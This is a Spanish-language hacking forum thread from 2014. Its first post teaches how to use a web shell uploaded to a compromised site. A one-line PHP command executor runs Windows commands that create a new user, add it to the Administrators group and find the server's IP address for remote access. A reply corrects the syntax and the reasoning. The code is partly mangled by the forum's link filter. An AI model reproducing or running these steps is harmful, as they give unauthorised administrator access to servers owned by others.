Elevar privilegios en servidores windows

« **en:** Noviembre 23, 2014, 06:46:36 pm »

Hola gente, aquí les vengo a enseñar como elevar privilegios en servidores windows.

Bueno primero necesitan tener subida una shell a una web o host.
Después tener un archivo shell server windows subido en la web o host.

El código que incrustaremos es este:

Código: PHP

<?php You are not allowed to view links.
 Register or Login($_GET['cmd']); ?>

Ya con el archivo subido van al link website.com/archivo.php?cmd=whoami y les tiene que aparecer NT
AUTORITHY/SYSTEM si no les sale nada o les sale NT es porque no tiene servidor vps la web o host.

Ya que realizado lo anterior ahora ponemos : website.com/archivo.php?cmd=net user para ver los usuarios que tiene el servidor VPS.

Ya que hecho esto, ponemos: website.com/archivo.php?cmd=net user (NOMBRE DEL USUARIO QUE VAN A CREAR) (CONTRASEÑA QUE VAN A PONERLE) /add esto es para crear el usuario, sin los paréntesis.

Bueno ya que hicimos esto nos aparecerá (THE COMMAND COMPLETED SUCCESSFULLY) ya hecho esto hacemos lo siguiente: website.com/archivo.php?cmd=net user para ver nuestro usuario añadido si no sale es que hicieron algo mal.

Ahora hacemos esto: website.com/archivo.php?cmd=net localgroup Administrators (NOMBRE DEL USUARIO QUE HAN CREADO) /add y tiene que salir (THE COMMAND COMPLETED SUCCESSFULLY) esto es para darnos privilegios de Administrador en el servidor vps, sin los paréntesis.

Ahora para saber la IP del servidor VPS ponemos: website.com.com/archivo.php?cmd=ipconfig

Ya hecho todos estos pasos, podremos acceder al servidor vps como un Administrador.

Saludos.

« **Respuesta #1 en:** Noviembre 23, 2014, 07:41:14 pm »

Un par de cosas

El titulo mas bien tendria que ser "Elevar privilegios en servidores windows", por que da lo mismo que sea un vps o un server compartido, etc. ~~No todos los vps usan win~~.

Aca tenes error de sintaxis

Citar

- El archivo es este : <? php system $_GET[cmd]); ?>

seria

Código: PHP

<?php You are not allowed to view links.
 Register or Login($_GET['cmd']); ?>

Citar

- Ya con el archivo subido van al link website.com/archivo.php?cmd=whoami y les tiene que aparecer algo así nt autorythy/system nt. O cualquiera parecido si no les sale nada o les sale nt es porque no tiene vps la página web.

Sos NT AUTHORITY\SYSTEM y queres rootear?? si ya tenes los maximos privs.

Citar

si no les sale nada o les sale nt es porque no tiene vps la página web

O_O

Averigua sobre los temas que remarque y corregi el post por favor.

WebCruiser Enterprise V2.6.1 - Scanner de vulnerabilidades para Windows Iniciado por PussyMagnet	Respuestas: 4 Vistas: 2876	Agosto 20, 2012, 02:02:30 pm por Pr0ph3t
PENTEST BOX: herramienta de pentesting para sistemas Windows Iniciado por Gabriela	Respuestas: 2 Vistas: 4083	Junio 07, 2015, 12:30:13 pm por blackdrake
[Video] Explotando Apache Tomcat 5.5 + Acceso Root + Escalación de Privilegios Iniciado por LucaSthefano	Respuestas: 0 Vistas: 1562	Julio 18, 2011, 03:09:22 pm por LucaSthefano
[Video] Guía de Metasploit - Distccd + Escalación de Privilegios [Episodio I] Iniciado por LucaSthefano	Respuestas: 0 Vistas: 1772	Julio 18, 2011, 02:56:42 pm por LucaSthefano

Esta es una respuesta al tema: Elevar privilegios en servidores windows en La plantilla. Pentesting

Elevar privilegios en servidores windows

Decode

Elevar privilegios en servidores windows

q3rv0

Re:Rootear Servidores VPS

Similar topics (4)